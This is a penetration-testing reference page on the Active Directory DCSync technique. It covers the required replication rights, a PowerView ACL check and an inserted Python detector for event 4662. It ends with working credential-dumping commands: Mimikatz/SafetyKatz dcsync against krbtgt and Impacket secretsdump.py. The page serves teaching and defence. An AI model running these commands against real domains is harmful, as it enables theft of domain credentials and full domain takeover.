DCSync

DCSync is a technique used to extract credentials (password hashes) from a Domain Controller without running code on the DC itself.


To perform a DCSync attack, we need the following rights on the domain object:

  1. Replicating Directory Changes (DS-Replication-Get-Changes)

  2. Replicating Directory Changes All (DS-Replication-Get-Changes-All)

  3. Replicating Directory Changes In Filtered Set (DS-Replication-Get-Changes-In-Filtered-Set) (this one isn't always needed, but it is usually added just in case)

By default, the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups already hold the required rights.

A DCSync attack impersonates a Domain Controller so that password hashes can be retrieved: it uses the Directory Replication Service (DRS) Remote Protocol (MS-DRSR) to ask a DC to replicate user credentials, exactly as a peer DC would during normal replication. Because the request is a legitimate replication call, it leaves no trace on the DC's file system and is only visible in the DC's security audit log and on the wire.

To check who has the privileges to request user credentials from a DC (PowerView), list the ACEs on the domain object that grant a replication right, GenericAll or WriteDacl:

Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}
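As a defensive counterpart to the ACL check above, the following is an added example (not from the original page) that flags DCSync-style requests in Windows Security event 4662 records: a replication request appears as a 4662 whose Properties field carries the control-access-right GUIDs behind the three rights listed above, issued by an account that is not a Domain Controller. The sample events are constructed; the GUIDs are the real schema constants; the trailing-"$" check for DC accounts is a simplifying assumption.

```python
# Added example (not part of the original page): flag DCSync-style replication
# requests in Windows Security event 4662 ("An operation was performed on an
# object"). A run of DCSync shows up as a 4662 whose Properties field carries
# one of the replication control-access-right GUIDs behind the rights listed
# above, issued by an account that is not itself a domain controller.

# Control-access-right GUIDs; these are fixed in the AD schema, identical in every forest.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

def is_dc_account(subject: str) -> bool:
    """Computer accounts end in '$', and DCs replicate with each other legitimately.
    Assumption: production logic should check Domain Controllers OU membership,
    not just the trailing '$' (any computer account name ends that way)."""
    return subject.endswith("$")

def dcsync_alerts(events):
    """Return (subject, [right names]) for each 4662 event that looks like DCSync.

    Each event is a dict with the fields a SIEM would extract from 4662:
    EventID, SubjectUserName, ObjectType, Properties (the raw GUID list)."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        # Properties looks like "%%7688\r\n\t{guid}\r\n\t{guid}"; %%7688 resolves to "Control Access".
        guids = {tok.strip("{}").lower() for tok in ev.get("Properties", "").split()}
        hits = sorted(REPLICATION_RIGHTS[g] for g in guids & REPLICATION_RIGHTS.keys())
        if hits and not is_dc_account(ev.get("SubjectUserName", "")):
            alerts.append((ev["SubjectUserName"], hits))
    return alerts

# Constructed sample records (field names mirror the 4662 event XML; values are made up).
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$", "ObjectType": "domainDNS",  # DC-to-DC replication: benign
     "Properties": "%%7688\r\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\r\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "svc-backup", "ObjectType": "domainDNS",  # user account pulling secrets
     "Properties": "%%7688\r\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\r\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "ObjectType": "user",  # ordinary object access, no replication right
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
    {"EventID": 4624, "SubjectUserName": "jdoe", "ObjectType": "", "Properties": ""},  # unrelated logon event
]

if __name__ == "__main__":
    for subject, rights in dcsync_alerts(SAMPLE_EVENTS):
        print(f"possible DCSync by {subject}: {', '.join(rights)}")
```

Event 4662 is only emitted when "Audit Directory Service Access" is enabled and the domain object's SACL audits Control Access for Everyone, so confirm that auditing is in place before relying on this rule.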

Example scenarios for exploiting DCSync:

  1. We assume that we have the hash of a user account that is a member of the Domain Admins group. Since that account is in DA, we can use its hash for Over-Pass-the-Hash via Mimikatz to obtain a session as that user and then perform DCSync, requesting the KRBTGT credentials from a DC.

  2. We assume that we have credentials for a user that has WriteDACL rights on the domain object. Since the user has WriteDACL, we can use it to grant DCSync rights to any user we own. Once the owned user has DCSync rights, we can run Invoke-Mimikatz from that user's shell and perform the DCSync attack to retrieve the KRBTGT hashes.

Exploit Locally

To use the DCSync feature to get the krbtgt hash, execute one of the commands below with DA privileges in the us domain:

Invoke-Mimikatz -Command '"lsadump::dcsync /user:us\krbtgt"'

SafetyKatz.exe "lsadump::dcsync /user:us\krbtgt" "exit"

Exploit Remotely

Using Impacket's secretsdump.py from a remote host:

secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes

[-just-dc-user <USERNAME>] # dump only the secrets of that one user
[-pwd-last-set] # show when each account's password was last changed
[-history] # dump password history, which may help offline password cracking
